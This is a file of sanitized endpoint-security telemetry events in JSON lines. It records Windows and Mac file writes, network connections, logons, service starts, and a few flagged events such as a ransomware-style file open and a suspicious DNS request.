-{"ConfigBuild":"1007.3.0011603.1","ConfigStateHash":"3899738370","ContextProcessId":"1546527409909","ContextThreadId":"4711690090889","ContextTimeStamp":"1604855114.133","DesiredAccess":"1180054","EffectiveTransmissionClass":"3","Entitlements":"15","FileAttributes":"0","FileIdentifier":"501ee2c32e53fb43b07f419f3236fb45c29e000000002c00","FileObject":"18446655033844205120","Information":"2","IrpFlags":"2180","MajorFunction":"0","MinorFunction":"0","OperationFlags":"0","Options":"88080484","ShareAccess":"1","Status":"0","TargetFileName":"\\Device\\HarddiskVolume4\\Windows\\Temp\\__PSScriptPolicyTest_dvkjnbka.apn.ps1","aid":"ffffffff8f1e4b77b4dae5debaa1c8bc","aip":"208.216.150.210","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Win","event_simpleName":"NewScriptWritten","id":"ffffffff-1111-11eb-80b5-06e11a66e03d","name":"NewScriptWrittenV7","timestamp":"1604855114427"} -{"ConfigBuild":"1007.4.0012205.1","ConfigStateHash":"1306766522","ConnectionDirection":"1","ConnectionFlags":"0","ContextProcessId":"321275232072440993","ContextTimeStamp":"1604855116.421","Entitlements":"15","InContext":"0","LocalAddressIP4":"0.0.0.0","LocalPort":"0","Protocol":"6","RemoteAddressIP4":"208.72.48.107","RemotePort":"443","aid":"ffffffffd4094240a6b1d12aaf304f4f","aip":"208.216.150.211","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Mac","event_simpleName":"NetworkConnectIP4","id":"ffffffff-1111-11eb-aca9-02683aed2a0d","name":"NetworkConnectIP4MacV5","timestamp":"1604855116502"} 
-{"ConfigBuild":"1007.3.0011603.1","ConfigStateHash":"2602391615","ConnectionDirection":"0","ConnectionFlags":"0","ContextProcessId":"223442259384","ContextTimeStamp":"1604855116.849","EffectiveTransmissionClass":"3","Entitlements":"15","InContext":"0","LocalAddressIP4":"208.22.254.101","LocalPort":"53961","Protocol":"6","RemoteAddressIP4":"208.91.140.216","RemotePort":"443","aid":"fffffffff000426eb99afaa2ccdcbc17","aip":"208.216.150.194","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Win","event_simpleName":"NetworkConnectIP4","id":"ffffffff-1111-11eb-b0eb-06be7616c211","name":"NetworkConnectIP4V5","timestamp":"1604855116942"} -{"AuthenticationId":"6580764513","AuthenticationPackage":"Negotiate","ClientComputerName":"-","ConfigBuild":"1007.3.0011603.1","ConfigStateHash":"3011122681","ContextProcessId":"816054990879","ContextThreadId":"52913017705957","ContextTimeStamp":"1604855091.781","EffectiveTransmissionClass":"2","Entitlements":"15","LogonDomain":"NT AUTHORITY","LogonServer":"","LogonTime":"1604855091.781","LogonType":"9","PasswordLastSet":"","RemoteAccount":"1","UserFlags":"0","UserIsAdmin":"0","UserLogonFlags":"12","UserName":"SYSTEM","UserPrincipal":"user4@dom2","UserSid":"S-1-5-18","aid":"ffffffff8d2e4b4f9b21b40633a8d579","aip":"208.216.128.255","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Win","event_simpleName":"UserLogon","id":"ffffffff-1111-11eb-a8cf-0649c95cfa1d","name":"UserLogonV8","timestamp":"1604855121077"} 
-{"AuthenticationId":"2007206396","ConfigBuild":"1007.3.0011603.1","ConfigStateHash":"3011122681","ContextProcessId":"4415814628770","ContextThreadId":"41392001729898","ContextTimeStamp":"1604855120.785","DiskParentDeviceInstanceId":"PCI\\VEN_1000\u0026DEV_0054\u0026SUBSYS_197615AD\u0026REV_01\\4\u00261f16fef7\u00260\u002600A8","EffectiveTransmissionClass":"3","Entitlements":"15","FileEcpBitmask":"0","FileIdentifier":"b57cb59769dfe71180b4806e6f6e6963ea8902000000cb2c","FileObject":"18446708893089967904","IrpFlags":"1028","IsOnNetwork":"0","IsOnRemovableDisk":"0","IsTransactedFile":"0","MajorFunction":"18","MinorFunction":"0","OperationFlags":"0","SHA256HashData":"d0e1b81f3f3f18256f6447703624019eaee9b1068b3f09323eced4f547cc4182","Size":"6144","TargetFileName":"\\Device\\HarddiskVolume2\\Users\\user10\\AppData\\Local\\Temp\\ec1ijefl.dll","TokenType":"1","aid":"ffffffff2c47454cba360bc404a607bb","aip":"208.216.144.255","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Win","event_simpleName":"PeFileWritten","id":"ffffffff-1111-11eb-b091-06f6cca0a049","name":"PeFileWrittenV14","timestamp":"1604855121109"} -{"AuthenticationId":"317005428","AuthenticationPackage":"Negotiate","ConfigBuild":"1007.3.0011603.1","ConfigStateHash":"3950066843","EffectiveTransmissionClass":"2","Entitlements":"15","LogoffTime":"1604855132.756","LogonDomain":"dom1","LogonServer":"srv2","LogonTime":"1604855131.666","LogonType":"7","PasswordLastSet":"1598119332.510","RemoteAccount":"1","UserFlags":"32","UserIsAdmin":"0","UserLogoffType":"3","UserLogonFlags":"0","UserName":"user4","UserPrincipal":"user.name@dom2.com","UserSid":"S-1-5-21-606747145-1364589140-725345543-28636","aid":"ffffffffe0104823bd3de859d5bc8bc7","aip":"208.216.134.211","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Win","event_simpleName":"UserLogoff","id":"ffffffff-1111-11eb-8913-0287fd11c79b","name":"UserLogoffV3","timestamp":"1604855134461"} 
-{"ConfigBuild":"1007.3.0011603.1","ConfigStateHash":"537307300","ContextProcessId":"635780922149","ContextThreadId":"9479299143023","ContextTimeStamp":"1604855025.966","DesiredAccess":"1180054","EffectiveTransmissionClass":"3","Entitlements":"15","FileAttributes":"128","FileIdentifier":"0e02a8c7ed9d244887cef0409af0e6190030000000001100","FileObject":"18446695174291796544","Information":"2","IrpFlags":"2180","MajorFunction":"0","MinorFunction":"0","OperationFlags":"0","Options":"83886176","ShareAccess":"3","Status":"0","TargetFileName":"\\Device\\HarddiskVolume4\\Program Files\\Snow Software\\Inventory\\Agent\\cloudmeteringhost.exe","aid":"ffffffff425942f58382dbb11350eeda","aip":"208.216.150.192","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Win","event_simpleName":"NewExecutableWritten","id":"ffffffff-1111-11eb-93cb-067deb43537b","name":"NewExecutableWrittenV1","timestamp":"1604855149643"} -{"ConfigBuild":"1007.3.0011603.1","ConfigStateHash":"3765958535","ConnectionDirection":"2","ConnectionFlags":"0","ContextProcessId":"50714198593318","ContextThreadId":"194302491825207","ContextTimeStamp":"1604855150.066","EffectiveTransmissionClass":"3","Entitlements":"15","InContext":"0","LocalAddressIP4":"127.0.0.1","LocalPort":"59491","Protocol":"6","RemoteAddressIP4":"0.0.0.0","RemotePort":"0","aid":"ffffffffa51b4acf9dbc1fc273e6145c","aip":"208.222.216.124","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Win","event_simpleName":"NetworkListenIP4","id":"ffffffff-1111-11eb-8726-063418e4a9e7","name":"NetworkListenIP4V5","timestamp":"1604855150545"} 
-{"ClientComputerName":"com1","ConfigBuild":"1007.3.0011603.1","ConfigStateHash":"3011122681","ContextProcessId":"7073822473144","ContextThreadId":"48689911139327","ContextTimeStamp":"1604855152.993","EffectiveTransmissionClass":"2","Entitlements":"15","EtwRawProcessId":"744","EtwRawThreadId":"5304","LogonDomain":"BROADCAST","LogonType":"3","RemoteAddressIP4":"208.80.28.100","Status":"3221225581","SubStatus":"3221225578","UserName":"user5","aid":"ffffffffd8844a59acce5e1f4ad01888","aip":"208.216.128.255","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Win","event_simpleName":"UserLogonFailed2","id":"ffffffff-1111-11eb-a8aa-067029dffccb","name":"UserLogonFailed2V2","timestamp":"1604855154274"} -{"ConfigBuild":"1007.3.0011603.1","ConfigStateHash":"3343111420","ContextProcessId":"1838383212125","ContextThreadId":"27242382481217","ContextTimeStamp":"1604855151.534","EffectiveTransmissionClass":"3","Entitlements":"15","FileIdentifier":"b0754a8f86feffffb0754a8f86feffff09764a8f86feffff","FileObject":"18446636884348143072","IrpFlags":"1028","MajorFunction":"18","MinorFunction":"0","OperationFlags":"0","TargetFileName":"\\Device\\HarddiskVolume3\\Program Files\\WindowsApps\\Deleted\\Microsoft.Getstarted_9.10.32461.0_x64__8wekyb3d8bbweacf6b996-01b3-402c-bd01-a67529f94699\\clrcompression.dll","aid":"ffffffff4a0946365161093453e596d4","aip":"208.216.150.195","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Win","event_simpleName":"ExecutableDeleted","id":"ffffffff-1111-11eb-b23b-064dea059649","name":"ExecutableDeletedV3","timestamp":"1604855154670"} 
-{"AsepWrittenCount":"0","ConfigBuild":"1007.4.0009202.1","ConfigStateHash":"230795414","ContextProcessId":"318137549555284836","ContextThreadId":"0","ContextTimeStamp":"1604855135.209","DirectoryCreatedCount":"0","DnsRequestCount":"0","Entitlements":"15","ExecutableDeletedCount":"0","FileDeletedCount":"0","NetworkBindCount":"0","NetworkCapableAsepWriteCount":"0","NetworkCloseCount":"0","NetworkConnectCount":"0","NetworkListenCount":"0","NetworkRecvAcceptCount":"0","NewExecutableWrittenCount":"0","RawProcessId":"20195","SHA256HashData":"295fbc2356e8605e804f95cb6d6f992335e247dbf11767fe8781e2a7f889978a","SuspectStackCount":"0","SuspiciousDnsRequestCount":"0","TargetProcessId":"318137549555284836","aid":"ffffffffcfe84e8c6a52c4001bd83761","aip":"208.173.124.176","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Mac","event_simpleName":"EndOfProcess","id":"ffffffff-1111-11eb-ae31-065d76bec0c3","name":"EndOfProcessMacV11","timestamp":"1604855160047"} -{"ApiReturnValue":"1","ConfigBuild":"1007.3.0011603.1","ConfigStateHash":"3338885535","ContextProcessId":"683078218537","ContextTimeStamp":"1604855171.731","EffectiveTransmissionClass":"3","Entitlements":"15","EtwRawProcessId":"19400","EtwRawThreadId":"9384","aid":"ffffffff80984ea8b49d9a53f590c566","aip":"208.24.76.36","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Win","event_simpleName":"RegisterRawInputDevicesEtw","id":"ffffffff-1111-11eb-a570-0685ba2a382f","name":"RegisterRawInputDevicesEtwV1","timestamp":"1604855173077"} 
-{"CompletionEventId":"Event_ChannelDataDownloadCompleteV1","ConfigBuild":"1007.3.0011603.1","ConfigStateHash":"3338885535","DownloadPath":"metahash+/cfs/channelfiles/0000000013/b2acba1a30a3407dae27d0503611022d/C-00000013-00000000-00000408.sys","DownloadPort":"443","DownloadServer":"lfodown01-b.cloudsink.net","EffectiveTransmissionClass":"0","Entitlements":"15","TargetFileName":"C-00000013-00000000-00000408.sys","aid":"ffffffffffc94c645268f64fc900213f","aip":"208.64.212.186","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Win","event_simpleName":"LFODownloadConfirmation","id":"ffffffff-1111-11eb-8ab5-0643392fc75d","name":"LFODownloadConfirmationV1","timestamp":"1604855174018"} -{"ConfigBuild":"1007.3.0011603.1","ConfigStateHash":"1763245019","ContextProcessId":"2071361595421","ContextThreadId":"41650430047375","ContextTimeStamp":"1604855146.590","EffectiveTransmissionClass":"3","Entitlements":"15","FileIdentifier":"4b0121a43dfc1f4ca54eea679ddbcd4eef2103000000ca00","FileObject":"18446622606546437424","IrpFlags":"395312","MajorFunction":"6","MinorFunction":"0","NewFileIdentifier":"4b0121a43dfc1f4ca54eea679ddbcd4eef2103000000ca00","OperationFlags":"0","SourceFileName":"\\Device\\HarddiskVolume3\\Windows\\assembly\\temp\\EKA0UARWWK\\Microsoft.WSMan.Management.ni.dll","TargetFileName":"\\Device\\HarddiskVolume3\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.We0722664#\\c2579d00f9849413b8b7948dd00ac863\\Microsoft.WSMan.Management.ni.dll","aid":"ffffffff280b41b956a91e816bd9b9b0","aip":"208.105.150.175","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Win","event_simpleName":"NewExecutableRenamed","id":"ffffffff-1111-11eb-8162-0663305b686f","name":"NewExecutableRenamedV6","timestamp":"1604855177513"} 
-{"ConfigBuild":"1007.3.0011603.1","ConfigStateHash":"402097454","ContextProcessId":"66601077523","ContextThreadId":"2500785639062","ContextTimeStamp":"1604855165.213","DesiredAccess":"1048577","EffectiveTransmissionClass":"3","Entitlements":"15","FileAttributes":"128","FileIdentifier":"d2f4250ff1ba3b4ca66e123c5269884ca6f8020000002700","FileObject":"18446641334185168032","Information":"2","IrpFlags":"2180","MajorFunction":"0","MinorFunction":"0","OperationFlags":"0","Options":"35668001","ShareAccess":"3","Status":"0","TargetFileName":"\\Device\\HarddiskVolume3\\Windows\\CbsTemp\\30848497_1904507751\\FodWU","aid":"ffffffff2c9f4066b0b5f2f00265503c","aip":"208.216.128.255","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Win","event_simpleName":"DirectoryCreate","id":"ffffffff-1111-11eb-9411-06b7c99be087","name":"DirectoryCreateV1","timestamp":"1604855180332"} -{"AuthenticationId":"999","CommandLine":"C:\\WINDOWS\\system32\\svchost.exe -k netsvcs -p -s wlidsvc","ConfigBuild":"1007.3.0011603.1","ConfigStateHash":"3343111420","ContextTimeStamp":"1604855196.468","EffectiveTransmissionClass":"3","Entitlements":"15","ImageFileName":"\\Device\\HarddiskVolume3\\Windows\\System32\\svchost.exe","InterfaceGuid":"367ABB81-9844-35F1-AD32-98F038001003","InterfaceVersion":"131072","RpcClientProcessId":"949196415400","RpcClientThreadId":"44209361549673","RpcNestingLevel":"0","RpcOpNum":"19","ServiceDisplayName":"wlidsvc","TargetProcessId":"955370934902","TokenType":"1","UserName":"user6","aid":"fffffffffcc4413057adc260e99b0774","aip":"208.9.106.189","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Win","event_simpleName":"ServiceStarted","id":"ffffffff-1111-11eb-9c98-02c501fe7d81","name":"ServiceStartedV2","timestamp":"1604855196635"} 
-{"ConfigBuild":"1007.4.0011104.1","ConfigStateHash":"203564169","ConnectionDirection":"0","ConnectionFlags":"0","ContextProcessId":"319255017313886870","ContextTimeStamp":"1604855200.751","Entitlements":"15","InContext":"0","LocalAddressIP6":"0:0:0:0:0:0:0:0","LocalPort":"0","Protocol":"6","RemoteAddressIP6":"0:0:0:0:0:0:0:1","RemotePort":"2181","aid":"ffffffffed0f41575620ab9fb25ce105","aip":"208.62.90.250","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Mac","event_simpleName":"NetworkConnectIP6","id":"ffffffff-1111-11eb-81f1-061cdebbd115","name":"NetworkConnectIP6MacV5","timestamp":"1604855200836"} -{"AuthenticationId":"1656178821","AuthenticationPackage":"Kerberos","ConfigBuild":"1007.3.0011603.1","ConfigStateHash":"3338885535","ContextProcessId":"30254389526587","ContextThreadId":"275230771323179","EffectiveTransmissionClass":"2","Entitlements":"15","LogonDomain":"dom1","LogonId":"1656178821","LogonServer":"srv1","LogonTime":"1604855211.249","LogonType":"5","PasswordLastSet":"1530626210.104","RemoteAccount":"1","SessionId":"0","UserCanonical":"","UserFlags":"32","UserIsAdmin":"0","UserLogonFlags":"0","UserName":"user7","UserPrincipal":"user7@dom4.cm","UserSid":"S-1-5-21-606747145-1364589140-725345543-183372","aid":"ffffffff73164cfa9656c4caff8a2a38","aip":"208.216.134.209","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Win","event_simpleName":"UserIdentity","id":"ffffffff-1111-11eb-86e3-02db1faa1327","name":"UserIdentityV2","timestamp":"1604855212031"} -{"AuthenticationId":"999","CommandLine":"C:\\WINDOWS\\System32\\svchost.exe -k netsvcs -p -s 
NetSetupSvc","ConfigBuild":"1007.3.0010609.1","ConfigStateHash":"4193986770","EffectiveTransmissionClass":"3","Entitlements":"15","ImageFileName":"\\Device\\HarddiskVolume3\\Windows\\System32\\svchost.exe","ImageSubsystem":"2","IntegrityLevel":"16384","MD5HashData":"8a0a29438052faed8a2532da50455756","ParentAuthenticationId":"999","ParentProcessId":"2881931477041","ProcessCreateFlags":"525324","ProcessEndTime":"","ProcessParameterFlags":"8193","ProcessStartTime":"1604842733.215","ProcessSxsFlags":"64","RawProcessId":"6160","SHA1HashData":"0000000000000000000000000000000000000000","SHA256HashData":"7fd065bac18c5278777ae44908101cdfed72d26fa741367f0ad4d02020787ab6","SessionId":"0","SourceProcessId":"2881931477041","SourceThreadId":"70316664105336","Tags":"27, 29, 53, 54, 55, 185, 10445360464024, 10445360464025, 10445360464026, 10445360464258, 10445360464273, 10445360464274, 12094627905582, 12094627906234, 211655988347297","TargetProcessId":"2882232404222","TokenType":"2","UserSid":"S-1-5-18","WindowFlags":"128","aid":"ffffffffbe8a46386afe80c5ef64d0b5","aip":"208.65.31.23","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Win","event_simpleName":"ProcessRollup2","id":"ffffffff-1111-11eb-b4f9-06e3a7e5503b","name":"ProcessRollup2V16","timestamp":"1604855237946"} 
-{"ConfigBuild":"1007.3.0011603.1","ConfigStateHash":"1763245019","ContextProcessId":"1016182570608","ContextThreadId":"37343520154472","ContextTimeStamp":"1604829512.519","DesiredAccess":"1179785","EffectiveTransmissionClass":"3","Entitlements":"15","FileAttributes":"0","FileIdentifier":"7a9c1c1610045d45a54bd6643ac12ea767a5020000000c00","FileObject":"18446670458156489088","Information":"1","IrpFlags":"2180","MajorFunction":"0","MinorFunction":"0","OperationFlags":"0","Options":"16777312","ShareAccess":"5","Status":"0","TargetFileName":"\\Device\\HarddiskVolume3\\Users\\user11\\Downloads\\file.pptx","aid":"ffffffffac4148947ed68497e89f3308","aip":"208.226.182.36","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Win","event_simpleName":"RansomwareOpenFile","id":"ffffffff-1111-11eb-9756-06fe7f8f682f","name":"RansomwareOpenFileV4","timestamp":"1604855242091"} -{"AllocateVirtualMemoryCount":"0","ArchiveFileWrittenCount":"0","AsepWrittenCount":"0","BinaryExecutableWrittenCount":"0","CLICreationCount":"0","ConHostId":"13532","ConHostProcessId":"1731198143955","ConfigBuild":"1007.3.0010609.1","ConfigStateHash":"2030177841","ContextData":"","ContextProcessId":"1741732942772","ContextThreadId":"28523520529271","ContextTimeStamp":"1604855274.377","CycleTime":"473618996","DirectoryCreatedCount":"0","DirectoryEnumeratedCount":"0","DnsRequestCount":"0","DocumentFileWrittenCount":"0","EffectiveTransmissionClass":"3","Entitlements":"15","ExeAndServiceCount":"0","ExecutableDeletedCount":"0","ExitCode":"0","FileDeletedCount":"0","GenericFileWrittenCount":"0","ImageSubsystem":"2","InjectedDllCount":"0","InjectedThreadCount":"0","KernelTime":"1406250","MaxThreadCount":"16","ModuleLoadCount":"72","NetworkBindCount":"0","NetworkCapableAsepWriteCount":"0","NetworkCloseCount":"0","NetworkConnectCount":"0","NetworkConnectCountUdp":"0","NetworkListenCount":"0","NetworkModuleLoadCount":"0","NetworkRecvAcceptCount":"0","NewExecutableWrittenCount":"0","ParentProcessId":"1731198143955"
,"PrivilegedProcessHandleCount":"0","ProcessStartTime":"1604855154.465","ProtectVirtualMemoryCount":"0","QueueApcCount":"0","RawProcessId":"18176","RegKeySecurityDecreasedCount":"0","RemovableDiskFileWrittenCount":"0","RunDllInvocationCount":"0","SHA256HashData":"87419b84f34cdb13f699c0f0803c957e48c27ad83334fcad7bac9ad89c0a466f","ScreenshotsTakenCount":"0","ScriptEngineInvocationCount":"0","ServiceEventCount":"0","SetThreadContextCount":"0","SnapshotFileOpenCount":"0","SuspectStackCount":"0","SuspiciousCredentialModuleLoadCount":"0","SuspiciousDnsRequestCount":"0","SuspiciousFontLoadCount":"0","SuspiciousRawDiskReadCount":"0","TargetProcessId":"1741732942772","UnsignedModuleLoadCount":"0","UserMemoryAllocateExecutableCount":"0","UserMemoryAllocateExecutableRemoteCount":"0","UserMemoryProtectExecutableCount":"0","UserMemoryProtectExecutableRemoteCount":"0","UserSid":"S-1-12-1-1647509123-1308660782-3901357462-3999411581","UserTime":"781250","aid":"fffffffffdab492a5a20cd0417395a73","aip":"208.216.134.192","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Win","event_simpleName":"EndOfProcess","id":"ffffffff-1111-11eb-b685-0241eaddc553","name":"EndOfProcessV14","timestamp":"1604855276657"} 
-{"AuthenticationId":"895027","ConfigBuild":"1007.3.0011603.1","ConfigStateHash":"3338885535","ContextProcessId":"1786917081743","ContextThreadId":"31685015444484","ContextTimeStamp":"1604855317.892","EffectiveTransmissionClass":"3","Entitlements":"15","FileEcpBitmask":"0","FileIdentifier":"0000000000000000be341bb58bc5f1f2a24339010200510e","FileObject":"18446636933702558240","IrpFlags":"1028","IsOnNetwork":"1","IsOnRemovableDisk":"0","MajorFunction":"18","MinorFunction":"0","OperationFlags":"0","Size":"223989","TargetFileName":"\\Device\\Mup\\intranet.dev\\int\\Test.pptx","TokenType":"1","aid":"fffffffffa474d216472f3edb73c75ed","aip":"208.216.134.214","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Win","event_simpleName":"OoxmlFileWritten","id":"ffffffff-1111-11eb-9165-067ee18a7975","name":"OoxmlFileWrittenV11","timestamp":"1604855329571"} -{"ConfigBuild":"1007.3.0011603.1","ConfigStateHash":"3765958535","ConnectionDirection":"2","ConnectionFlags":"0","ContextProcessId":"439029805661","ContextThreadId":"273683743193497","ContextTimeStamp":"1604855351.158","EffectiveTransmissionClass":"3","Entitlements":"15","InContext":"0","LocalAddressIP6":"a93:432:ffff:0:c830:b4bf:1e0:ffff","LocalPort":"50373","Protocol":"6","RemoteAddressIP6":"0:0:0:0:0:0:0:0","RemotePort":"0","aid":"ffffffff1f924e228a807ea4c0f21b0b","aip":"208.222.208.124","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Win","event_simpleName":"NetworkListenIP6","id":"ffffffff-1111-11eb-85f5-02ab029194b9","name":"NetworkListenIP6V5","timestamp":"1604855351798"} 
-{"ConfigBuild":"1007.4.0011104.1","ConfigStateHash":"1457965279","ContextProcessId":"321365562189152025","ContextThreadId":"0","ContextTimeStamp":"1604846070.744","Entitlements":"15","SHA256HashData":"e1bed7598ffdecf63a4d240f8309b528fc45068c6cb8137a5090f3afeb57f29d","Size":"29646","TargetFileName":"/System/Library/CoreServices/SecurityAgentPlugins/HomeDirMechanism.bundle/Contents/MacOS/HomeDirMechanism/..namedfork/rsrc","VnodeModificationType":"10","aid":"ffffffff1f32487185fcde66a9dc0528","aip":"208.69.144.69","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Mac","event_simpleName":"AsepFileChange","id":"ffffffff-1111-11eb-b9b4-063e98f9b19b","name":"AsepFileChangeMacV2","timestamp":"1604855355495"} -{"ConfigBuild":"1007.3.0011603.1","ConfigStateHash":"3011122681","ContextProcessId":"2932136","ContextThreadId":"36157339485804","ContextTimeStamp":"1604855191.803","EffectiveTransmissionClass":"2","Entitlements":"15","LogonTime":"","PasswordLastSet":"","UserLogonFlags":"1","UserName":"user7","UserSid":"S-1-5-10","aid":"ffffffffa5bd4efaa195a7132c576edc","aip":"208.216.128.255","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Win","event_simpleName":"UserLogonFailed","id":"ffffffff-1111-11eb-aa5a-0207e26418af","name":"UserLogonFailedV1","timestamp":"1604855193422"} -{"ConfigBuild":"1007.3.0011603.1","ConfigStateHash":"1858880895","ConnectionDirection":"0","ConnectionFlags":"0","ContextProcessId":"56042872298","ContextTimeStamp":"1604855136.669","EffectiveTransmissionClass":"3","Entitlements":"15","InContext":"0","LocalAddressIP6":"2a02:ffff:11:8000:d140:da90:aa7a:62a5","LocalPort":"49689","Protocol":"6","RemoteAddressIP6":"2a00:ffff:11:809:0:0:0:200e","RemotePort":"443","aid":"ffffffff6854438eb4181691ec47e43d","aip":"208.68.193.187","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Win","event_simpleName":"NetworkConnectIP6","id":"ffffffff-1111-11eb-a889-061944805289","name":"NetworkConnectIP6V5","timestamp":"1604855199798"} 
-{"ConfigBuild":"1007.4.0011104.1","ConfigStateHash":"1789338890","ContextProcessId":"321382909294815631","ContextThreadId":"0","ContextTimeStamp":"1604853755.987","Entitlements":"15","SHA256HashData":"fa07e991e0c3f3661794bba39061433265162b10cd9036751941cc45e6a4b583","Size":"165","SourceFileName":"/Library/Application Support/JAMF/tmp/.dat.nosync2c98.VBwjsq","TargetFileName":"/Library/Application Support/JAMF/tmp/6B24D2B6-BC17-4470-8078-91A787A19478","aid":"ffffffffc07b49d6b7426e970523671a","aip":"208.213.180.70","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Mac","event_simpleName":"NewExecutableRenamed","id":"ffffffff-1111-11eb-8773-06939a2f0915","name":"NewExecutableRenamedMacV1","timestamp":"1604855213224"} -{"ConfigBuild":"1007.4.0011104.1","ConfigStateHash":"203564169","ConnectionDirection":"0","ConnectionFlags":"0","ContextProcessId":"321367236803434269","ContextTimeStamp":"1604855268.323","Entitlements":"15","InContext":"0","LocalAddressIP6":"0:0:0:0:0:0:0:0","LocalPort":"51076","Protocol":"6","RemoteAddressIP6":"0:0:0:0:0:0:0:0","RemotePort":"0","aid":"ffffffffa60a47af4ebd2a76070f0d4f","aip":"208.131.50.212","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Mac","event_simpleName":"NetworkListenIP6","id":"ffffffff-1111-11eb-9a50-0669ff09604d","name":"NetworkListenIP6MacV5","timestamp":"1604855268755"} -{"ConfigBuild":"1007.3.0011603.1","ConfigStateHash":"3765958535","ContextProcessId":"1611521722601","ContextThreadId":"53405065993811","ContextTimeStamp":"1604855280.307","DomainName":"raw.githubusercontent.com","DualRequest":"0","EffectiveTransmissionClass":"3","Entitlements":"15","InterfaceIndex":"0","RequestType":"1","aid":"ffffffff6d724d38af99c628fb904626","aip":"208.216.134.211","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Win","event_simpleName":"SuspiciousDnsRequest","id":"ffffffff-1111-11eb-885e-02ac336efd4b","name":"SuspiciousDnsRequestV2","timestamp":"1604855323217"} 
-{"ConfigBuild":"100.3.0011603.1","ContextProcessId":"4492535979973","ContextThreadId":"14023068415125","ContextTimeStamp":"1604855315.034","DiskParentDeviceInstanceId":"PCI\\VEN_8086\u0026DEV_31E3\u0026SUBSYS_080C1028\u0026REV_03\\3\u002611583659\u00260\u002690","EffectiveTransmissionClass":"3","Entitlements":"15","VolumeDeviceCharacteristics":"131072","VolumeDeviceObjectFlags":"134479872","VolumeDeviceType":"8","VolumeDriveLetter":"C:","VolumeFileSystemDevice":"\\Ntfs","VolumeFileSystemDriver":"\\FileSystem\\Ntfs","VolumeFileSystemType":"2","VolumeIsEncrypted":"0","VolumeMountPoint":"\\??\\Volume{9b46da3f-ce44-432f-9230-c9201504bfd7}","VolumeName":"\\Device\\HarddiskVolume4","VolumeRealDeviceName":"\\Device\\HarddiskVolume4","VolumeSectorSize":"512","aid":"ffffffff1990483499a736373600eef7","aip":"208.216.134.193","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Win","event_simpleName":"FsVolumeMounted","id":"ffffffff-1111-11eb-9be9-024459b713c5","name":"FsVolumeMountedV6","timestamp":"1604855329102"} -{"ConfigBuild":"1007.4.0011104.1","ConfigStateHash":"1789338890","ConnectionDirection":"0","ConnectionFlags":"0","ContextProcessId":"321210562584146513","ContextTimeStamp":"1604855127.011","Entitlements":"15","InContext":"0","LocalAddressIP4":"127.0.0.1","LocalPort":"53","Protocol":"6","RemoteAddressIP4":"0.0.0.0","RemotePort":"0","aid":"ffffffffe5ff467b4f0c4fd41a4462bb","aip":"208.71.20.13","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Mac","event_simpleName":"NetworkListenIP4","id":"ffffffff-1111-11eb-ae74-065212970c5d","name":"NetworkListenIP4MacV5","timestamp":"1604855128936"} 
-{"AuthenticationId":"999","ConfigBuild":"1007.3.0011603.1","ConfigStateHash":"3338885535","ContextTimeStamp":"1604855185.108","EffectiveTransmissionClass":"3","Entitlements":"15","ImageFileName":"\\Device\\HarddiskVolume1\\Windows\\System32\\gpsvc.dll","InterfaceGuid":"367ABB81-9844-35F1-AD32-98F038001003","InterfaceVersion":"131072","RpcClientProcessId":"219053851298","RpcClientThreadId":"22047924482692","RpcNestingLevel":"0","RpcOpNum":"19","ServiceDisplayName":"gpsvc","TargetProcessId":"224116976578","TargetThreadId":"22920092479704","TokenType":"1","UserName":"user7","aid":"ffffffff59514ea68b4693ddfb9b6643","aip":"208.216.134.213","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Win","event_simpleName":"HostedServiceStarted","id":"ffffffff-1111-11eb-860c-0606af112d55","name":"HostedServiceStartedV2","timestamp":"1604855184068"} -{"ConfigBuild":"1007.3.0011603.1","ConfigStateHash":"3338885535","ContextTimeStamp":"1604855299.018","EffectiveTransmissionClass":"3","Entitlements":"15","ServiceDisplayName":"wuauserv","TargetProcessId":"661455186053","TargetThreadId":"24238019995551","aid":"ffffffff2b5a4bf5afc6682595faa016","aip":"208.216.134.213","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Win","event_simpleName":"HostedServiceStopped","id":"ffffffff-1111-11eb-9b11-0602a5689467","name":"HostedServiceStoppedV1","timestamp":"1604855302512"} 
